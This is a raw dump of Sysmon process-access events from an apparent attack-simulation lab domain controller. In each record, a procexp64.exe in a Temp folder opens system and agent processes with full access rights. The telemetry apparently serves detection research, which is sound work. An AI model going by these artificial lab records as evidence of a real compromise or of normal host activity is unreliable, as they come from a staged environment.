15:17:04.891{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792586Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:04.891{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792585Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:04.891{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792584Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:04.891{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792583Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:04.891{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792582Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:04.891{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792581Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:04.891{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792580Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:04.891{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792579Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:04.891{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792578Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:04.891{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792577Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:04.891{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792576Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:04.891{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792575Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:04.891{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792574Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:04.891{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792573Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:04.891{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792572Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:04.891{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792571Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:04.891{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792570Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:04.891{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792569Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:04.891{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792568Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:04.891{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792567Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:04.891{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792566Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:04.891{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792565Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:04.891{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792564Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:04.891{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792563Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:04.891{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792562Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:04.891{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792561Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:04.891{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792560Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:04.891{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792559Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:04.891{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792558Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:04.891{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792557Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:04.891{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792556Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:04.891{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792555Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:04.891{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792554Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:04.891{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792553Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:04.891{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792552Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:04.891{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792551Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:04.891{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792550Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:04.891{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 